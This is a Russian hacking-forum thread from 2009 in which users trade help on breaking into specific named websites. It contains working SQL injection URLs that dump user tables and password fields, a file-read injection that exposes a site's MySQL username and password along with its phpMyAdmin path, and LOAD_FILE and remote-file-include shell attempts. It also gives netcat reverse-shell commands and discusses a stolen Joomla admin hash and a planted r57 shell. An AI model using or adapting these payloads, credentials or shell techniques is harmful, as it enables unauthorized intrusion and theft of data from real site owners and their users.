Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),database(),version()),25,26,27,28,29,30,31,32,33,34.html
    Вот инъекция. Табличка с юзерами называется user. Как мне их оттуда выдрать?
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ограничение длины запроса. Вывод - никак по данной ссылке, даже при таком варианте:

    Code:
    http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,version(),5,6,7,8,9,0,1,2,3,4.html
    
    вернее можно, элементарно, но так:

    Code:
    http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/1+and+substring(version(),1,1)=5.html
    
    т.е. как бы вслепую
     
    #6082 Pashkela, 24 Mar 2009
    Last edited: 24 Mar 2009
    1 person likes this.
  3. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    ПОмогите админку найти
    http://www.rustrana.ru/
     
  4. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Чисто таблички user нету,
    PHP:
    http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+DISTINCT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(concat(table_schema,0x2E,table_name)+separator+0x3c62723e),25,26,27,28,29,30,31,32,33,34+from+INFORMATION_SCHEMA.TABLES+where+table_schema+not+in+(0x696e666f726d6174696f6e5f736368656d61)+and+table_name+LIKE+0x257573657225.html
    karabas_svalka2.t_users
    karabas_svalka2.t_users_activate

    karabas_svalka2.t_users(в t_users_activate такие же колумны):
    PHP:
    http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+DISTINCT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(COLUMN_NAME+separator+0x3c62723e),25,26,27,28,29,30,31,32,33,34+from+INFORMATION_SCHEMA.COLUMNS+where+table_name='t_users'.html
    id
    email
    passwd
    user_type
    creation_date
    comment
    name
    phone
    icq
    id_city
    id_country
    bday
    bmonth
    byear
    sex
    id_prefix


    ну не вижу в чем проблема вытаскивай например вот так с них:
    PHP:
    http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(concat_ws(0x3A,name,passwd)+separator+'%3Cbr%3E'),25,26,27,28,29,30,31,32,33,34+from+karabas_svalka2.t_users.html
    2Byrger
    Читалка файлов(как мило с их стороны :))
    PHP:
    http://www.rustrana.ru/article.php?nid=3486853333+union+select+concat('/var/www/site3/public_html/connect.php',0x00),2,3,4,5,@@version,7,8,9,10,11,12,13,14,15--+
    Реквизиты конекта MySQL:
    USER:dbu_ansimov_1
    PASS:BFzHAHAMz1K

    Ну и сам phpMyAdmin - http://www.rustrana.ru/phpadm/
     
    #6084 AkyHa_MaTaTa, 24 Mar 2009
    Last edited: 24 Mar 2009
    2 people like this.
  5. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    чтобы зайти в эти директории нужно быть в той же группе что и тот комп к примеру: MSHOME
    и у тебя название и пароль учётки должен быть такой же как у того админа...
     
  6. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    теперь проверь эти порты хspider'om на уязвимости
     
    1 person likes this.
  7. Art-Ge-Force

    Art-Ge-Force Member

    Joined:
    19 Apr 2008
    Messages:
    20
    Likes Received:
    5
    Reputations:
    0
    http://wow.homeline.kg/test/?apage=guilds&guid=102'
    что тут можно сделать ? можно шелл залить ?
     
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://wow.homeline.kg/test/?apage=guilds&guid=102+and+substring(version(),1,1)=5
    5-я ветка.

    Code:
    http://wow.homeline.kg/test/?apage=guilds&guid=102+union+select+1
    1 колонка без вывода.

    Code:
    http://wow.homeline.kg/test/?apage=guilds&guid=102+and+ascii(substring((SELECT+file_priv+from+mysql.user+limit+0,1),1,1))=89
    file_priv=Y.

    Шелл не зальёшь, файлы не прочтешь (ковычки фильтруются, принтабельных полей нету)
     
    #6088 mailbrush, 25 Mar 2009
    Last edited: 25 Mar 2009
    1 person likes this.
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Просто не нужно торопиться

    http://wow.homeline.kg/test/?apage=guilds&guid=-102)+UNION+SELECT+1,2,3,concat_ws(0x3a,User(),Database(),Version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+

    http://wow.homeline.kg/test/?apage=guilds&guid=-102)+UNION+SELECT+1,2,3,LOAD_FILE(0x633A2F626F6F742E696E69),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+

    И ещё момент, file_priv так не проверяется. Тоесть в данном случае это прокатило, но ты же не знал, что база под рутом. Ты проверил его у первой записи в таблице, а это всегда (почти) рут. А нужно проверять у текущего юзера
     
    2 people like this.
  10. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Поимел шелл на серваке, сплоит под это ядро имеется, gcc есть, но не могу забиндить порт (фаер блочит видимо), тупо виснет.Скомпилить через шелл так же не вышло.Бэк коннект средствами шелла пишет "Now script try connect to ИП port ПОРТ", но netcat молчит =( Возможно сижу за натом. Кто может помочь? В пм плиз.
    З.Ы. Порты разные пробовал, shell - r57
    ________________________________
    added
    Ещё вопросец.
    Вытянул из джумлы админский пасс в хеше
    Такого вида
    (id,username,password)
    62::admin::b3b05184a80b4915a7ea49f1b06cefcb:Z1RKNCslakgoAAuq55wasFVX8zGRYkIa
    Солёный? Или?
     
    #6090 Imperou$, 25 Mar 2009
    Last edited: 25 Mar 2009
  11. serg88

    serg88 Elder - Старейшина

    Joined:
    30 Jul 2006
    Messages:
    144
    Likes Received:
    73
    Reputations:
    -5
    Решил вспомнить молодость зашел на Майл.ру чат - и нефига чото у меня неотображает сообщения то

    чо тако ??
     
  12. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    фаер скорей всего и блочит. попробуй забиндить под бэккэнект уже открытый порт.

    или я туплю, и нечего не выйдет?)) скорей всего ничего и не выйдет, ели фаер умный)
     
    #6092 ph1l1ster, 25 Mar 2009
    Last edited: 25 Mar 2009
  13. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Зачем писать это в теме об уязвимостям? Это у тебя с браузером чото!
     
  14. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Набрел на сайт, вроде есть php-инъекция. Вот сайт: http://linuxgamers.net/infoPage.php?page=acidlaunch

    Пробовал инклудить шелл вот так http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell

    и вот так

    http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell.php

    Выводится пустая страница. В чем моя ошибка?
     
  15. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    с чего ты взял что там php injection?
     
    #6095 z00MAN, 25 Mar 2009
    Last edited: 25 Mar 2009
  16. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla
    вылазиет ошибка, значит он возможен?
    или нет?
     
  17. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    не факт
    не обязательно если выходит ошибка при "page=blalbabla" то есть php injection
     
    #6097 z00MAN, 25 Mar 2009
    Last edited: 25 Mar 2009
  18. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Как это-забиндить под бэкконнект? Если я смогу забиндить-то нах мне бэкконнект?
    Просто мне нужно узнать, как например поставить бэкконнект не на мой ип, а на левую тачку, к которой у меня есть доступ (скажем так), или подобный вариант, т.к. я сижу за натом, как оказалось.
     
  19. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    биндишь порт - не факт что приконектишься
    для бекконекта неткатом
    nc -v www.adres_deda.com -e /bin/sh &
    на деде nc -l -p
    помоему так
     
  20. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Что за ошибка то?
     
Thread Status:
Not open for further replies.